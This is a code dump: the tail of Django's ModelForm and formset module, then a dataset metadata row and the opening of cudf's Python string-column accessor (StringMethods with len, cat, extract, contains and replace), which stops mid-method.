    def save(self, commit=True):
        new_instance = model()
        return save_instance(self, new_instance, fields, fail_message, commit)
    return save
def make_instance_save(instance, fields, fail_message):
    """Build a ``save(commit=True)`` method bound to an *existing* instance.

    The generated method delegates the write to ``save_instance`` using the
    captured ``instance``.
    """
    def save(self, commit=True):
        return save_instance(
            self, instance, fields, fail_message, commit
        )
    return save
def form_for_fields(field_list):
    """
    Returns a Form class for the given list of Django database field instances.

    Non-editable fields are skipped; each remaining model field contributes
    its default form field.
    """
    editable_fields = SortedDict()
    for field in field_list:
        if field.editable:
            editable_fields[field.name] = field.formfield()
    return type('FormForFields', (BaseForm,), {'base_fields': editable_fields})
# ModelForms #################################################################
def model_to_dict(instance, fields=None, exclude=None):
    """
    Returns a dict of ``instance``'s field values, suitable for passing as
    a Form's ``initial`` keyword argument.

    ``fields`` is an optional list of field names restricting the result;
    ``exclude`` removes the named fields even if they appear in ``fields``.
    """
    # avoid a circular import
    from django.db.models.fields.related import ManyToManyField, OneToOneField
    data = {}
    meta = instance._meta
    for field in meta.fields + meta.many_to_many:
        if not field.editable:
            continue
        if fields and field.name not in fields:
            continue
        if exclude and field.name in exclude:
            continue
        if not isinstance(field, ManyToManyField):
            data[field.name] = field.value_from_object(instance)
        elif instance.pk is None:
            # An unsaved object cannot have m2m data yet; calling
            # value_from_object would raise, so use an empty list.
            data[field.name] = []
        else:
            # MultipleChoiceWidget needs a list of pks, not object instances.
            data[field.name] = [
                related.pk for related in field.value_from_object(instance)
            ]
    return data
def fields_for_model(model, fields=None, exclude=None, formfield_callback=lambda f: f.formfield()):
    """
    Returns a ``SortedDict`` mapping field names to form fields for ``model``.

    ``fields`` optionally restricts the result to the named fields;
    ``exclude`` removes the named fields even if they appear in ``fields``.
    ``formfield_callback`` converts each model field to a form field; a
    falsy result drops the field.
    """
    # TODO: if fields is provided, it would be nice to return fields in that order
    opts = model._meta
    result = SortedDict()
    for model_field in opts.fields + opts.many_to_many:
        if not model_field.editable:
            continue
        if fields and model_field.name not in fields:
            continue
        if exclude and model_field.name in exclude:
            continue
        form_field = formfield_callback(model_field)
        if form_field:
            result[model_field.name] = form_field
    return result
class ModelFormOptions(object):
    """Holds the ``Meta`` options recognised by ModelForm.

    Each of ``model``, ``fields`` and ``exclude`` defaults to None when the
    attribute is absent from the supplied options object.
    """
    def __init__(self, options=None):
        for option_name in ('model', 'fields', 'exclude'):
            setattr(self, option_name, getattr(options, option_name, None))
class ModelFormMetaclass(type):
    # Metaclass for ModelForm: collects declared form fields and, when a
    # Meta.model is given, merges in form fields generated from the model.
    def __new__(cls, name, bases, attrs):
        # Pop the callback so it does not linger as a class attribute.
        formfield_callback = attrs.pop('formfield_callback',
                lambda f: f.formfield())
        try:
            parents = [b for b in bases if issubclass(b, ModelForm)]
        except NameError:
            # We are defining ModelForm itself.
            parents = None
        declared_fields = get_declared_fields(bases, attrs, False)
        new_class = super(ModelFormMetaclass, cls).__new__(cls, name, bases,
                attrs)
        # ModelForm itself (no ModelForm parents) needs no further setup.
        if not parents:
            return new_class

        if 'media' not in attrs:
            new_class.media = media_property(new_class)
        opts = new_class._meta = ModelFormOptions(getattr(new_class, 'Meta', None))
        if opts.model:
            # If a model is defined, extract form fields from it.
            fields = fields_for_model(opts.model, opts.fields,
                                      opts.exclude, formfield_callback)
            # Override default model fields with any custom declared ones
            # (plus, include all the other declared fields).
            fields.update(declared_fields)
        else:
            fields = declared_fields
        new_class.declared_fields = declared_fields
        new_class.base_fields = fields
        return new_class
class BaseModelForm(BaseForm):
    # A Form bound to a model instance: seeds initial data from the instance,
    # validates unique/unique_together constraints, and saves back via save().
    def __init__(self, data=None, files=None, auto_id='id_%s', prefix=None,
                 initial=None, error_class=ErrorList, label_suffix=':',
                 empty_permitted=False, instance=None):
        opts = self._meta
        if instance is None:
            # if we didn't get an instance, instantiate a new one
            self.instance = opts.model()
            object_data = {}
        else:
            self.instance = instance
            object_data = model_to_dict(instance, opts.fields, opts.exclude)
        # if initial was provided, it should override the values from instance
        if initial is not None:
            object_data.update(initial)
        super(BaseModelForm, self).__init__(data, files, auto_id, prefix, object_data,
                                            error_class, label_suffix, empty_permitted)

    def clean(self):
        self.validate_unique()
        return self.cleaned_data

    def validate_unique(self):
        # Validate `unique` and `unique_together` model constraints against
        # the database, restricted to fields actually present on this form.
        from django.db.models.fields import FieldDoesNotExist

        # Gather a list of checks to perform. Since this is a ModelForm, some
        # fields may have been excluded; we can't perform a unique check on a
        # form that is missing fields involved in that check.
        unique_checks = []
        for check in self.instance._meta.unique_together[:]:
            fields_on_form = [field for field in check if field in self.fields]
            if len(fields_on_form) == len(check):
                unique_checks.append(check)

        form_errors = []

        # Gather a list of checks for fields declared as unique and add them to
        # the list of checks. Again, skip fields not on the form.
        for name, field in self.fields.items():
            try:
                f = self.instance._meta.get_field_by_name(name)[0]
            except FieldDoesNotExist:
                # This is an extra field that's not on the ModelForm, ignore it
                continue
            # MySQL can't handle ... WHERE pk IS NULL, so make sure we
            # don't generate queries of that form.
            is_null_pk = f.primary_key and self.cleaned_data[name] is None
            if name in self.cleaned_data and f.unique and not is_null_pk:
                unique_checks.append((name,))

        # Don't run unique checks on fields that already have an error.
        unique_checks = [check for check in unique_checks if not [x in self._errors for x in check if x in self._errors]]

        bad_fields = set()
        for unique_check in unique_checks:
            # Try to look up an existing object with the same values as this
            # object's values for all the unique field.

            lookup_kwargs = {}
            for field_name in unique_check:
                lookup_kwargs[field_name] = self.cleaned_data[field_name]

            qs = self.instance.__class__._default_manager.filter(**lookup_kwargs)

            # Exclude the current object from the query if we are editing an
            # instance (as opposed to creating a new one)
            if self.instance.pk is not None:
                qs = qs.exclude(pk=self.instance.pk)

            # This cute trick with extra/values is the most efficient way to
            # tell if a particular query returns any results.
            if qs.extra(select={'a': 1}).values('a').order_by():
                model_name = capfirst(self.instance._meta.verbose_name)

                # A unique field
                if len(unique_check) == 1:
                    field_name = unique_check[0]
                    field_label = self.fields[field_name].label
                    # Insert the error into the error dict, very sneaky
                    self._errors[field_name] = ErrorList([
                        _(u"%(model_name)s with this %(field_label)s already exists.") % \
                        {'model_name': unicode(model_name),
                         'field_label': unicode(field_label)}
                    ])
                # unique_together
                else:
                    field_labels = [self.fields[field_name].label for field_name in unique_check]
                    field_labels = get_text_list(field_labels, _('and'))
                    form_errors.append(
                        _(u"%(model_name)s with this %(field_label)s already exists.") % \
                        {'model_name': unicode(model_name),
                         'field_label': unicode(field_labels)}
                    )

                # Mark these fields as needing to be removed from cleaned data
                # later.
                for field_name in unique_check:
                    bad_fields.add(field_name)

        for field_name in bad_fields:
            del self.cleaned_data[field_name]
        if form_errors:
            # Raise the unique together errors since they are considered
            # form-wide.
            raise ValidationError(form_errors)

    def save(self, commit=True):
        """
        Saves this ``form``'s cleaned_data into model instance
        ``self.instance``.

        If commit=True, then the changes to ``instance`` will be saved to the
        database. Returns ``instance``.
        """
        # An unset pk means this save is a creation; report accordingly.
        if self.instance.pk is None:
            fail_message = 'created'
        else:
            fail_message = 'changed'
        return save_instance(self, self.instance, self._meta.fields, fail_message, commit)
class ModelForm(BaseModelForm):
    # Public base class; the metaclass derives base_fields from Meta.model.
    __metaclass__ = ModelFormMetaclass
def modelform_factory(model, form=ModelForm, fields=None, exclude=None,
                      formfield_callback=lambda f: f.formfield()):
    """Build and return a ModelForm subclass for ``model``.

    ``fields``/``exclude`` restrict which model fields become form fields;
    ``formfield_callback`` converts each model field to a form field.
    """
    # HACK: we should be able to construct a ModelForm without creating
    # and passing in a temporary inner class
    class Meta:
        pass
    for option, value in (('model', model), ('fields', fields),
                          ('exclude', exclude)):
        setattr(Meta, option, value)
    form_name = model.__name__ + 'Form'
    form_attrs = {'Meta': Meta, 'formfield_callback': formfield_callback}
    return ModelFormMetaclass(form_name, (form,), form_attrs)
# ModelFormSets ##############################################################
class BaseModelFormSet(BaseFormSet):
    """
    A ``FormSet`` for editing a queryset and/or adding new objects to it.
    """
    # Set by modelformset_factory on the generated subclass.
    model = None

    def __init__(self, data=None, files=None, auto_id='id_%s', prefix=None,
                 queryset=None, **kwargs):
        self.queryset = queryset
        defaults = {'data': data, 'files': files, 'auto_id': auto_id, 'prefix': prefix}
        defaults['initial'] = [model_to_dict(obj) for obj in self.get_queryset()]
        defaults.update(kwargs)
        super(BaseModelFormSet, self).__init__(**defaults)

    def _construct_form(self, i, **kwargs):
        # Forms below the initial count edit existing objects from the
        # queryset; the rest are blank "extra" forms.
        if i < self._initial_form_count:
            kwargs['instance'] = self.get_queryset()[i]
        return super(BaseModelFormSet, self)._construct_form(i, **kwargs)

    def get_queryset(self):
        # Cache the (possibly max_num-truncated) queryset on first access.
        if not hasattr(self, '_queryset'):
            if self.queryset is not None:
                qs = self.queryset
            else:
                qs = self.model._default_manager.get_query_set()
            if self.max_num > 0:
                self._queryset = qs[:self.max_num]
            else:
                self._queryset = qs
        return self._queryset

    def save_new(self, form, commit=True):
        """Saves and returns a new model instance for the given form."""
        return save_instance(form, self.model(), exclude=[self._pk_field.name], commit=commit)

    def save_existing(self, form, instance, commit=True):
        """Saves and returns an existing model instance for the given form."""
        return save_instance(form, instance, exclude=[self._pk_field.name], commit=commit)

    def save(self, commit=True):
        """Saves model instances for every form, adding and changing instances
        as necessary, and returns the list of instances.

        With commit=False, a ``save_m2m`` callable is attached so m2m data
        for all saved forms can be written later.
        """
        if not commit:
            self.saved_forms = []
            def save_m2m():
                for form in self.saved_forms:
                    form.save_m2m()
            self.save_m2m = save_m2m
        return self.save_existing_objects(commit) + self.save_new_objects(commit)

    def save_existing_objects(self, commit=True):
        # Process the initial forms: delete objects marked for deletion and
        # save changed ones; record both on the formset for inspection.
        self.changed_objects = []
        self.deleted_objects = []
        if not self.get_queryset():
            return []

        # Put the objects from self.get_queryset into a dict so they are easy to lookup by pk
        existing_objects = {}
        for obj in self.get_queryset():
            existing_objects[obj.pk] = obj

        saved_instances = []
        for form in self.initial_forms:
            obj = existing_objects[form.cleaned_data[self._pk_field.name]]
            if self.can_delete and form.cleaned_data[DELETION_FIELD_NAME]:
                self.deleted_objects.append(obj)
                obj.delete()
            else:
                if form.changed_data:
                    self.changed_objects.append((obj, form.changed_data))
                saved_instances.append(self.save_existing(form, obj, commit=commit))
                if not commit:
                    self.saved_forms.append(form)
        return saved_instances

    def save_new_objects(self, commit=True):
        # Process the extra forms: save any that actually contain data and
        # are not marked for deletion.
        self.new_objects = []
        for form in self.extra_forms:
            if not form.has_changed():
                continue
            # If someone has marked an add form for deletion, don't save the
            # object.
            if self.can_delete and form.cleaned_data[DELETION_FIELD_NAME]:
                continue
            self.new_objects.append(self.save_new(form, commit=commit))
            if not commit:
                self.saved_forms.append(form)
        return self.new_objects

    def add_fields(self, form, index):
        """Add a hidden field for the object's primary key."""
        from django.db.models import AutoField
        self._pk_field = pk = self.model._meta.pk
        if pk.auto_created or isinstance(pk, AutoField):
            form.fields[self._pk_field.name] = IntegerField(required=False, widget=HiddenInput)
        super(BaseModelFormSet, self).add_fields(form, index)
def modelformset_factory(model, form=ModelForm, formfield_callback=lambda f: f.formfield(),
                         formset=BaseModelFormSet,
                         extra=1, can_delete=False, can_order=False,
                         max_num=0, fields=None, exclude=None):
    """
    Returns a FormSet class for the given Django model class.

    The per-row form is produced by ``modelform_factory`` and then wrapped
    by ``formset_factory``; the model is attached to the resulting class.
    """
    row_form = modelform_factory(model, form=form, fields=fields,
                                 exclude=exclude,
                                 formfield_callback=formfield_callback)
    formset_class = formset_factory(row_form, formset, extra=extra,
                                    max_num=max_num, can_order=can_order,
                                    can_delete=can_delete)
    formset_class.model = model
    return formset_class
# InlineFormSets #############################################################
class BaseInlineFormSet(BaseModelFormSet):
    """A formset for child objects related to a parent."""
    def __init__(self, data=None, files=None, instance=None,
                 save_as_new=False, prefix=None):
        from django.db.models.fields.related import RelatedObject
        self.instance = instance
        # save_as_new=True re-saves the parent's children as brand new rows.
        self.save_as_new = save_as_new
        # is there a better way to get the object descriptor?
        self.rel_name = RelatedObject(self.fk.rel.to, self.model, self.fk).get_accessor_name()
        super(BaseInlineFormSet, self).__init__(data, files, prefix=prefix or self.rel_name)

    def _construct_forms(self):
        if self.save_as_new:
            # Treat all existing forms as extra (new) forms.
            self._total_form_count = self._initial_form_count
            self._initial_form_count = 0
        super(BaseInlineFormSet, self)._construct_forms()

    def _construct_form(self, i, **kwargs):
        form = super(BaseInlineFormSet, self)._construct_form(i, **kwargs)
        if self.save_as_new:
            # Remove the primary key from the form's data, we are only
            # creating new instances
            form.data[form.add_prefix(self._pk_field.name)] = None
        return form

    def get_queryset(self):
        """
        Returns this FormSet's queryset, but restricted to children of
        self.instance
        """
        kwargs = {self.fk.name: self.instance}
        return self.model._default_manager.filter(**kwargs)

    def save_new(self, form, commit=True):
        # Pre-link the new child to the parent via the FK's attname.
        kwargs = {self.fk.get_attname(): self.instance.pk}
        new_obj = self.model(**kwargs)
        return save_instance(form, new_obj, exclude=[self._pk_field.name], commit=commit)

    def add_fields(self, form, index):
        super(BaseInlineFormSet, self).add_fields(form, index)
        # When the FK doubles as the pk, it was excluded from the form, so a
        # hidden pk field must still be added explicitly.
        if self._pk_field == self.fk:
            form.fields[self._pk_field.name] = IntegerField(required=False, widget=HiddenInput)
def _get_foreign_key(parent_model, model, fk_name=None):
    """
    Finds and returns the ForeignKey from model to parent if there is one.

    If fk_name is provided, assume it is the name of the ForeignKey field.
    Raises Exception when the named field is missing/not a suitable FK, or
    when auto-discovery finds zero or more than one candidate FK.
    """
    # avoid circular import
    from django.db.models import ForeignKey
    opts = model._meta
    if fk_name:
        fks_to_parent = [f for f in opts.fields if f.name == fk_name]
        if len(fks_to_parent) == 1:
            fk = fks_to_parent[0]
            # The named field must be a FK to the parent model itself or to
            # one of its concrete ancestors.
            if not isinstance(fk, ForeignKey) or \
                    (fk.rel.to != parent_model and
                     fk.rel.to not in parent_model._meta.get_parent_list()):
                raise Exception("fk_name '%s' is not a ForeignKey to %s" % (fk_name, parent_model))
        elif len(fks_to_parent) == 0:
            raise Exception("%s has no field named '%s'" % (model, fk_name))
    else:
        # Try to discover what the ForeignKey from model to parent_model is
        fks_to_parent = [
            f for f in opts.fields
            if isinstance(f, ForeignKey)
            and (f.rel.to == parent_model
                or f.rel.to in parent_model._meta.get_parent_list())
        ]
        if len(fks_to_parent) == 1:
            fk = fks_to_parent[0]
        elif len(fks_to_parent) == 0:
            raise Exception("%s has no ForeignKey to %s" % (model, parent_model))
        else:
            raise Exception("%s has more than 1 ForeignKey to %s" % (model, parent_model))
    return fk
def inlineformset_factory(parent_model, model, form=ModelForm,
                          formset=BaseInlineFormSet, fk_name=None,
                          fields=None, exclude=None,
                          extra=3, can_order=False, can_delete=True, max_num=0,
                          formfield_callback=lambda f: f.formfield()):
    """
    Returns an ``InlineFormSet`` for the given kwargs.

    You must provide ``fk_name`` if ``model`` has more than one ``ForeignKey``
    to ``parent_model``.
    """
    fk = _get_foreign_key(parent_model, model, fk_name=fk_name)
    if fk.unique:
        # A unique FK to the parent means at most one child can exist.
        max_num = 1
    # The FK itself is filled in automatically, so always exclude it from
    # the generated form (without mutating the caller's list).
    if exclude is None:
        exclude = [fk.name]
    else:
        exclude = list(exclude) + [fk.name]
    FormSet = modelformset_factory(
        model,
        form=form,
        formfield_callback=formfield_callback,
        formset=formset,
        extra=extra,
        can_delete=can_delete,
        can_order=can_order,
        fields=fields,
        exclude=exclude,
        max_num=max_num,
    )
    FormSet.fk = fk
    return FormSet
# Fields #####################################################################
class ModelChoiceIterator(object):
    # Lazily yields (value, label) pairs for a ModelChoiceField, optionally
    # caching them on the field when cache_choices is set.
    def __init__(self, field):
        self.field = field
        self.queryset = field.queryset

    def __iter__(self):
        # The empty choice comes first, unless explicitly disabled.
        if self.field.empty_label is not None:
            yield (u"", self.field.empty_label)
        if self.field.cache_choices:
            if self.field.choice_cache is None:
                self.field.choice_cache = [
                    self.choice(obj) for obj in self.queryset.all()
                ]
            for choice in self.field.choice_cache:
                yield choice
        else:
            # Re-evaluate the queryset each iteration so fresh data is seen.
            for obj in self.queryset.all():
                yield self.choice(obj)

    def choice(self, obj):
        if self.field.to_field_name:
            # FIXME: The try..except shouldn't be necessary here. But this is
            # going in just before 1.0, so I want to be careful. Will check it
            # out later.
            try:
                key = getattr(obj, self.field.to_field_name).pk
            except AttributeError:
                key = getattr(obj, self.field.to_field_name)
        else:
            key = obj.pk
        return (key, self.field.label_from_instance(obj))
class ModelChoiceField(ChoiceField):
    """A ChoiceField whose choices are a model QuerySet."""
    # This class is a subclass of ChoiceField for purity, but it doesn't
    # actually use any of ChoiceField's implementation.
    default_error_messages = {
        'invalid_choice': _(u'Select a valid choice. That choice is not one of'
                            u' the available choices.'),
    }

    def __init__(self, queryset, empty_label=u"---------", cache_choices=False,
                 required=True, widget=None, label=None, initial=None,
                 help_text=None, to_field_name=None, *args, **kwargs):
        self.empty_label = empty_label
        self.cache_choices = cache_choices

        # Call Field instead of ChoiceField __init__() because we don't need
        # ChoiceField.__init__().
        Field.__init__(self, required, widget, label, initial, help_text,
                       *args, **kwargs)
        self.queryset = queryset
        self.choice_cache = None
        self.to_field_name = to_field_name

    def _get_queryset(self):
        return self._queryset

    def _set_queryset(self, queryset):
        self._queryset = queryset
        # Keep the widget's choices in sync with the new queryset.
        self.widget.choices = self.choices

    queryset = property(_get_queryset, _set_queryset)

    # this method will be used to create object labels by the QuerySetIterator.
    # Override it to customize the label.
    def label_from_instance(self, obj):
        """
        This method is used to convert objects into strings; it's used to
        generate the labels for the choices presented by this object. Subclasses
        can override this method to customize the display of the choices.
        """
        return smart_unicode(obj)

    def _get_choices(self):
        # If self._choices is set, then somebody must have manually set
        # the property self.choices. In this case, just return self._choices.
        if hasattr(self, '_choices'):
            return self._choices

        # Otherwise, execute the QuerySet in self.queryset to determine the
        # choices dynamically. Return a fresh QuerySetIterator that has not been
        # consumed. Note that we're instantiating a new QuerySetIterator *each*
        # time _get_choices() is called (and, thus, each time self.choices is
        # accessed) so that we can ensure the QuerySet has not been consumed. This
        # construct might look complicated but it allows for lazy evaluation of
        # the queryset.
        return ModelChoiceIterator(self)

    choices = property(_get_choices, ChoiceField._set_choices)

    def clean(self, value):
        Field.clean(self, value)
        if value in EMPTY_VALUES:
            return None
        try:
            # Look the value up by to_field_name when given, else by pk.
            key = self.to_field_name or 'pk'
            value = self.queryset.get(**{key: value})
        except self.queryset.model.DoesNotExist:
            raise ValidationError(self.error_messages['invalid_choice'])
        return value
class ModelMultipleChoiceField(ModelChoiceField):
    """A MultipleChoiceField whose choices are a model QuerySet."""
    widget = SelectMultiple
    hidden_widget = MultipleHiddenInput
    default_error_messages = {
        'list': _(u'Enter a list of values.'),
        'invalid_choice': _(u'Select a valid choice. %s is not one of the'
                            u' available choices.'),
    }

    def __init__(self, queryset, cache_choices=False, required=True,
                 widget=None, label=None, initial=None,
                 help_text=None, *args, **kwargs):
        # empty_label is forced to None: an empty "---------" entry makes
        # no sense for a multi-select.
        super(ModelMultipleChoiceField, self).__init__(queryset, None,
            cache_choices, required, widget, label, initial, help_text,
            *args, **kwargs)

    def clean(self, value):
        if self.required and not value:
            raise ValidationError(self.error_messages['required'])
        elif not self.required and not value:
            return []
        if not isinstance(value, (list, tuple)):
            raise ValidationError(self.error_messages['list'])
        # Resolve each submitted pk to its model instance, rejecting unknowns.
        final_values = []
        for val in value:
            try:
                obj = self.queryset.get(pk=val)
            except self.queryset.model.DoesNotExist:
                raise ValidationError(self.error_messages['invalid_choice'] % val)
            else:
                final_values.append(obj)
        return final_values
| 40.88412 | 121 | 0.615089 |
acfa9d9d39aea7371bab4ac71c8ed78822c469ce | 31,480 | py | Python | python/cudf/cudf/core/column/string.py | mt-jones/cudf | 1a70ee21aacef4c83971ddf14e1df98448b3fb81 | [
"Apache-2.0"
] | null | null | null | python/cudf/cudf/core/column/string.py | mt-jones/cudf | 1a70ee21aacef4c83971ddf14e1df98448b3fb81 | [
"Apache-2.0"
] | null | null | null | python/cudf/cudf/core/column/string.py | mt-jones/cudf | 1a70ee21aacef4c83971ddf14e1df98448b3fb81 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2019-2020, NVIDIA CORPORATION.
import functools
import pickle
import warnings
import numpy as np
import pandas as pd
import pyarrow as pa
import nvstrings
import rmm
import cudf._lib as libcudf
import cudf._libxx as libcudfxx
import cudf._libxx.string_casting as str_cast
from cudf._lib.nvtx import nvtx_range_pop, nvtx_range_push
from cudf._libxx.null_mask import bitmask_allocation_size_bytes
from cudf.core.buffer import Buffer
from cudf.core.column import column
from cudf.utils import utils
from cudf.utils.dtypes import is_list_like
# Dispatch table: numpy dtype -> libcudf routine that casts a *string*
# column to that numeric/boolean/timestamp type.
_str_to_numeric_typecast_functions = {
    np.dtype("int8"): str_cast.stoi8,
    np.dtype("int16"): str_cast.stoi16,
    np.dtype("int32"): str_cast.stoi,
    np.dtype("int64"): str_cast.stol,
    np.dtype("float32"): str_cast.stof,
    np.dtype("float64"): str_cast.stod,
    np.dtype("bool"): str_cast.to_booleans,
    # TODO: support Date32 UNIX days
    # np.dtype("datetime64[D]"): nvstrings.nvstrings.timestamp2int,
    np.dtype("datetime64[s]"): str_cast.timestamp2int,
    np.dtype("datetime64[ms]"): str_cast.timestamp2int,
    np.dtype("datetime64[us]"): str_cast.timestamp2int,
    np.dtype("datetime64[ns]"): str_cast.timestamp2int,
}

# Inverse dispatch table: numpy dtype -> libcudf routine that renders a
# column of that type as strings.
_numeric_to_str_typecast_functions = {
    np.dtype("int8"): str_cast.i8tos,
    np.dtype("int16"): str_cast.i16tos,
    np.dtype("int32"): str_cast.itos,
    np.dtype("int64"): str_cast.ltos,
    np.dtype("float32"): str_cast.ftos,
    np.dtype("float64"): str_cast.dtos,
    np.dtype("bool"): str_cast.from_booleans,
    # TODO: support Date32 UNIX days
    # np.dtype("datetime64[D]"): nvstrings.int2timestamp,
    np.dtype("datetime64[s]"): str_cast.int2timestamp,
    np.dtype("datetime64[ms]"): str_cast.int2timestamp,
    np.dtype("datetime64[us]"): str_cast.int2timestamp,
    np.dtype("datetime64[ns]"): str_cast.int2timestamp,
}
class StringMethods(object):
"""
This mimicks pandas `df.str` interface.
"""
    def __init__(self, parent, index=None, name=None):
        # parent: the string column/Series this accessor wraps.
        # index/name: propagated onto any Series produced by the accessor.
        self._parent = parent
        self._index = index
        self._name = name
    def __getattr__(self, attr, *args, **kwargs):
        """Proxy unknown attributes to the underlying nvstrings object,
        wrapping any nvstrings result back into a cudf Series."""
        from cudf.core.series import Series

        if hasattr(self._parent.nvstrings, attr):
            passed_attr = getattr(self._parent.nvstrings, attr)
            if callable(passed_attr):

                @functools.wraps(passed_attr)
                def wrapper(*args, **kwargs):
                    ret = passed_attr(*args, **kwargs)
                    # Convert string results back into a Series carrying the
                    # parent's index and name; other results pass through.
                    if isinstance(ret, nvstrings.nvstrings):
                        ret = Series(
                            column.as_column(ret),
                            index=self._index,
                            name=self._name,
                        )
                    return ret

                return wrapper
            else:
                return passed_attr
        else:
            raise AttributeError(attr)
    def __dir__(self):
        # Expose both this accessor's own methods and the proxied
        # nvstrings API (see __getattr__).
        keys = dir(type(self))
        return set(keys + dir(self._parent.nvstrings))
    def len(self):
        """
        Computes the length of each element in the Series/Index.

        Returns
        -------
        Series or Index of int: A Series or Index of integer values
            indicating the length of each element in the Series or Index.
        """
        from cudf.core.series import Series

        # Allocate a device buffer and let nvstrings write the lengths into
        # it through a raw pointer.
        out_dev_arr = rmm.device_array(len(self._parent), dtype="int32")
        ptr = libcudf.cudf.get_ctype_ptr(out_dev_arr)
        self._parent.nvstrings.len(ptr)

        # Propagate the parent's null mask, if any, onto the result.
        mask = None
        if self._parent.has_nulls:
            mask = self._parent.mask

        col = column.build_column(
            Buffer(out_dev_arr), np.dtype("int32"), mask=mask
        )
        return Series(col, index=self._index, name=self._name)
    def cat(self, others=None, sep=None, na_rep=None):
        """
        Concatenate strings in the Series/Index with given separator.

        If *others* is specified, this function concatenates the Series/Index
        and elements of others element-wise. If others is not passed, then all
        values in the Series/Index are concatenated into a single string with
        a given sep.

        Parameters
        ----------
        others : Series or List of str
            Strings to be appended.
            The number of strings must match size() of this instance.
            This must be either a Series of string dtype or a Python
            list of strings.

        sep : str
            If specified, this separator will be appended to each string
            before appending the others.

        na_rep : str
            This character will take the place of any null strings
            (not empty strings) in either list.

            - If `na_rep` is None, and `others` is None, missing values in
            the Series/Index are omitted from the result.
            - If `na_rep` is None, and `others` is not None, a row
            containing a missing value in any of the columns (before
            concatenation) will have a missing value in the result.

        Returns
        -------
        concat : str or Series/Index of str dtype
            If `others` is None, `str` is returned, otherwise a `Series/Index`
            (same type as caller) of str dtype is returned.
        """
        from cudf.core import Series, Index

        # Normalize `others` down to a raw nvstrings object (or leave it as
        # None) before delegating to nvstrings.cat below.
        if isinstance(others, Series):
            assert others.dtype == np.dtype("object")
            others = others._column.nvstrings
        elif isinstance(others, Index):
            assert others.dtype == np.dtype("object")
            others = others._values.nvstrings
        elif isinstance(others, StringMethods):
            """
            If others is a StringMethods then
            raise an exception
            """
            msg = "series.str is an accessor, not an array-like of strings."
            raise ValueError(msg)
        elif is_list_like(others) and others:
            """
            If others is a list-like object (in our case lists & tuples)
            just another Series/Index, great go ahead with concatenation.
            """

            """
            Picking first element and checking if it really adheres to
            list like conditions, if not we switch to next case

            Note: We have made a call not to iterate over the entire list as
            it could be more expensive if it was of very large size.
            Thus only doing a sanity check on just the first element of list.
            """
            first = others[0]

            if is_list_like(first) or isinstance(
                first, (Series, Index, pd.Series, pd.Index)
            ):
                """
                Internal elements in others list should also be
                list-like and not a regular string/byte
                """
                # Fold the list of columns pairwise into a single nvstrings
                # result, concatenating left-to-right.
                first = None
                for frame in others:
                    if not isinstance(frame, Series):
                        """
                        Make sure all inputs to .cat function call
                        are of type nvstrings so creating a Series object.
                        """
                        frame = Series(frame, dtype="str")

                    if first is None:
                        """
                        extracting nvstrings pointer since
                        `frame` is of type Series/Index and
                        first isn't yet initialized.
                        """
                        first = frame._column.nvstrings
                    else:
                        assert frame.dtype == np.dtype("object")
                        frame = frame._column.nvstrings
                        first = first.cat(frame, sep=sep, na_rep=na_rep)

                others = first
            elif not is_list_like(first):
                """
                Picking first element and checking if it really adheres to
                non-list like conditions.

                Note: We have made a call not to iterate over the entire
                list as it could be more expensive if it was of very
                large size. Thus only doing a sanity check on just the
                first element of list.
                """
                others = Series(others)
                others = others._column.nvstrings
        elif isinstance(others, (pd.Series, pd.Index)):
            others = Series(others)
            others = others._column.nvstrings

        data = self._parent.nvstrings.cat(
            others=others, sep=sep, na_rep=na_rep
        )
        out = Series(data, index=self._index, name=self._name)
        # With no `others`, the whole column collapses to one string:
        # return the scalar rather than a length-1 Series.
        if len(out) == 1 and others is None:
            out = out[0]
        return out
def join(self, sep):
"""
Join lists contained as elements in the Series/Index with passed
delimiter.
"""
raise NotImplementedError(
"Columns of arrays / lists are not yet " "supported"
)
def extract(self, pat, flags=0, expand=True):
"""
Extract capture groups in the regex `pat` as columns in a DataFrame.
For each subject string in the Series, extract groups from the first
match of regular expression `pat`.
Parameters
----------
pat : str
Regular expression pattern with capturing groups.
expand : bool, default True
If True, return DataFrame with on column per capture group.
If False, return a Series/Index if there is one capture group or
DataFrame if there are multiple capture groups.
Returns
-------
DataFrame or Series/Index
A DataFrame with one row for each subject string, and one column
for each group. If `expand=False` and `pat` has only one capture
group, then return a Series/Index.
Notes
-----
The `flags` parameter is not yet supported and will raise a
NotImplementedError if anything other than the default value is passed.
"""
if flags != 0:
raise NotImplementedError("`flags` parameter is not yet supported")
from cudf.core import DataFrame, Series
out = self._parent.nvstrings.extract(pat)
if len(out) == 1 and expand is False:
return Series(out[0], index=self._index, name=self._name)
else:
out_df = DataFrame(index=self._index)
for idx, val in enumerate(out):
out_df[idx] = val
return out_df
def contains(self, pat, case=True, flags=0, na=np.nan, regex=True):
"""
Test if pattern or regex is contained within a string of a Series or
Index.
Return boolean Series or Index based on whether a given pattern or
regex is contained within a string of a Series or Index.
Parameters
----------
pat : str
Character sequence or regular expression.
regex : bool, default True
If True, assumes the pattern is a regular expression.
If False, treats the pattern as a literal string.
Returns
-------
Series/Index of bool dtype
A Series/Index of boolean dtype indicating whether the given
pattern is contained within the string of each element of the
Series/Index.
Notes
-----
The parameters `case`, `flags`, and `na` are not yet supported and
will raise a NotImplementedError if anything other than the default
value is set.
"""
if case is not True:
raise NotImplementedError("`case` parameter is not yet supported")
elif flags != 0:
raise NotImplementedError("`flags` parameter is not yet supported")
elif na is not np.nan:
raise NotImplementedError("`na` parameter is not yet supported")
from cudf.core import Series
out_dev_arr = rmm.device_array(len(self._parent), dtype="bool")
ptr = libcudf.cudf.get_ctype_ptr(out_dev_arr)
self._parent.nvstrings.contains(pat, regex=regex, devptr=ptr)
mask = None
if self._parent.has_nulls:
mask = self._parent.mask
col = column.build_column(
Buffer(out_dev_arr), dtype=np.dtype("bool"), mask=mask
)
return Series(col, index=self._index, name=self._name)
def replace(self, pat, repl, n=-1, case=None, flags=0, regex=True):
"""
Replace occurences of pattern/regex in the Series/Index with some other
string.
Parameters
----------
pat : str
String to be replaced as a character sequence or regular
expression.
repl : str
String to be used as replacement.
n : int, default -1 (all)
Number of replacements to make from the start.
regex : bool, default True
If True, assumes the pattern is a regular expression.
If False, treats the pattern as a literal string.
Returns
-------
Series/Index of str dtype
A copy of the object with all matching occurrences of pat replaced
by repl.
Notes
-----
The parameters `case` and `flags` are not yet supported and will raise
a NotImplementedError if anything other than the default value is set.
"""
if case is not None:
raise NotImplementedError("`case` parameter is not yet supported")
elif flags != 0:
raise NotImplementedError("`flags` parameter is not yet supported")
# Pandas treats 0 as all
if n == 0:
n = -1
